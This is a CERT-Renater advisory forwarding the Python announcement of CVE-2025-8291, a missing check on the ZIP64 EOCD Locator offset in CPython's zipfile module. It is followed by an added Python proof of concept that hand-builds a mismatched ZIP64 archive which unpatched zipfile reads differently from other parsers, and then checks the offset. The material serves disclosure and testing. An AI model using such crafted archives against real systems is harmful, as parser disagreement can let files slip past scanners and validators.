
=====================================================================

                            CERT-Renater

                Note d'Information No. 2025/VULN677
_____________________________________________________________________

DATE                : 08/10/2025

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running CPython.

=====================================================================
https://mail.python.org/archives/list/security-announce@python.org/thread/QECOPWMTH4VPPJAXAH2BGTA4XADOP62G/
_____________________________________________________________________


[CVE-2025-8291] ZIP64 End of Central Directory (EOCD) Locator record
offset not checked

Seth Larson
7 October 2025 11:06

There is a MEDIUM severity vulnerability affecting CPython.

The 'zipfile' module would not check the validity of the ZIP64 End
of Central Directory (EOCD) Locator record offset value; the value
would not be used to locate the ZIP64 EOCD record, instead the ZIP64
EOCD record would be assumed to be the previous record in the ZIP
archive. This could be abused to create ZIP archives that are handled
differently by the 'zipfile' module compared to other ZIP
implementations.

Remediation maintains this behavior, but checks that the offset
specified in the ZIP64 EOCD Locator record matches the expected
value.

Please see the linked CVE ID for the latest information on
affected versions:

    https://www.cve.org/CVERecord?id=CVE-2025-8291
    https://github.com/python/cpython/pull/139702
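The following script is an added example and is not code from the
announcement above nor from the cpython repository. It hand-assembles a
small ZIP64 archive (constructed sample data) and then checks the ZIP64
EOCD Locator the way the remediation describes: the Locator's offset
field must equal the position of the record immediately preceding the
Locator. A second build plants a decoy ZIP64 EOCD record before the
central directory and points the Locator at it, so the "previous record"
reading reports one file while a parser that follows the Locator sees an
empty central directory. Record layouts follow APPNOTE.TXT; all function
and dictionary key names are this example's own.

```python
import io
import struct
import zipfile
import zlib

# Record layouts from APPNOTE.TXT, all little-endian.
LOCAL_FMT = "<4s5H3L2H"      # local file header, 30 bytes
CDIR_FMT = "<4s6H3L5H2L"     # central directory file header, 46 bytes
EOCD_FMT = "<4s4H2LH"        # End of Central Directory record, 22 bytes
EOCD64_FMT = "<4sQ2H2I4Q"    # ZIP64 EOCD record, 56 bytes (no extensible data)
LOC64_FMT = "<4sIQI"         # ZIP64 EOCD Locator, 20 bytes
EOCD_SIG, EOCD64_SIG, LOC64_SIG = b"PK\x05\x06", b"PK\x06\x06", b"PK\x06\x07"
EOCD64_SIZE = struct.calcsize(EOCD64_FMT)
LOC64_SIZE = struct.calcsize(LOC64_FMT)


def build_archive(lie_in_locator: bool) -> bytes:
    """Build a one-file STORED archive (constructed sample data) ending with
    ZIP64 EOCD record + Locator + EOCD.  With lie_in_locator=True a decoy
    ZIP64 EOCD record claiming an empty central directory is planted before
    the real central directory and the Locator's offset points at it instead
    of at the record sitting immediately before the Locator."""
    name, payload = b"hello.txt", b"hello zip64\n"
    crc = zlib.crc32(payload)
    out = bytearray()
    # Local file header + data at offset 0 (version 4.5, no flags, STORED).
    out += struct.pack(LOCAL_FMT, b"PK\x03\x04", 45, 0, 0, 0, 0x21, crc,
                       len(payload), len(payload), len(name), 0) + name + payload
    decoy_pos = len(out)
    if lie_in_locator:
        cd_off = decoy_pos + EOCD64_SIZE      # the real CD follows the decoy
        # The size field excludes the 12 leading bytes (signature + size).
        out += struct.pack(EOCD64_FMT, EOCD64_SIG, EOCD64_SIZE - 12, 45, 45,
                           0, 0, 0, 0, 0, cd_off)
    cd_off = len(out)
    out += struct.pack(CDIR_FMT, b"PK\x01\x02", 45, 45, 0, 0, 0, 0x21, crc,
                       len(payload), len(payload), len(name), 0, 0, 0, 0, 0, 0) + name
    cd_size = len(out) - cd_off
    real_pos = len(out)
    out += struct.pack(EOCD64_FMT, EOCD64_SIG, EOCD64_SIZE - 12, 45, 45,
                       0, 0, 1, 1, cd_size, cd_off)
    out += struct.pack(LOC64_FMT, LOC64_SIG, 0,
                       decoy_pos if lie_in_locator else real_pos, 1)
    out += struct.pack(EOCD_FMT, EOCD_SIG, 0, 0, 1, 1, cd_size, cd_off, 0)
    return bytes(out)


def find_eocd(data: bytes) -> int:
    """Offset of the EOCD record: the last signature whose comment length
    is consistent with the end of the file."""
    pos = data.rfind(EOCD_SIG)
    while pos >= 0:
        if pos + 22 <= len(data):
            comment_len = struct.unpack_from("<H", data, pos + 20)[0]
            if pos + 22 + comment_len == len(data):
                return pos
        pos = data.rfind(EOCD_SIG, 0, pos)
    raise ValueError("no End of Central Directory record")


def parse_eocd64(data: bytes, pos: int) -> dict:
    """Entry count, CD size and CD offset of the ZIP64 EOCD record at pos."""
    if pos < 0 or pos + EOCD64_SIZE > len(data) or data[pos:pos + 4] != EOCD64_SIG:
        raise ValueError(f"no ZIP64 EOCD record at offset {pos}")
    fields = struct.unpack_from(EOCD64_FMT, data, pos)
    return {"entries": fields[7], "cd_size": fields[8], "cd_offset": fields[9]}


def check_zip64_locator(data: bytes) -> dict:
    """Compare the Locator's offset with the 'record immediately before the
    Locator' assumption and show what each reading of the archive yields."""
    loc = find_eocd(data) - LOC64_SIZE
    if loc < 0 or data[loc:loc + 4] != LOC64_SIG:
        return {"zip64": False}
    _, disk, reloff, disks = struct.unpack_from(LOC64_FMT, data, loc)
    if disk != 0 or disks > 1:
        raise ValueError("multi-disk archives are not supported")
    assumed = loc - EOCD64_SIZE           # where the adjacent record must start
    return {
        "zip64": True,
        "locator_offset": reloff,
        "assumed_offset": assumed,
        "consistent": reloff == assumed,  # the check the remediation adds
        "via_adjacent": parse_eocd64(data, assumed),
        "via_locator": parse_eocd64(data, reloff),
    }


def zipfile_view(data: bytes):
    """Names the running interpreter's zipfile reports, or None if it
    rejects the archive with BadZipFile."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return zf.namelist()
    except zipfile.BadZipFile:
        return None


if __name__ == "__main__":
    for label, lying in (("consistent", False), ("mismatched", True)):
        data = build_archive(lying)
        report = check_zip64_locator(data)
        print(label, "locator ->", report["locator_offset"],
              "adjacent ->", report["assumed_offset"],
              "| zipfile sees", zipfile_view(data))
```

For the consistent build both readings agree and zipfile lists hello.txt.
For the mismatched build the adjacent record advertises one entry while
the record the Locator points at advertises none; an unpatched zipfile
(which ignores the Locator offset) still lists hello.txt, whereas an
interpreter carrying the fix should reject the archive because the
offset no longer matches the expected value.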


=========================================================
+ CERT-RENATER        |    tel : 01-53-94-20-44         +
+ 23/25 Rue Daviel    |    fax : 01-53-94-20-41         +
+ 75013 Paris         |   email:cert@support.renater.fr +
=========================================================
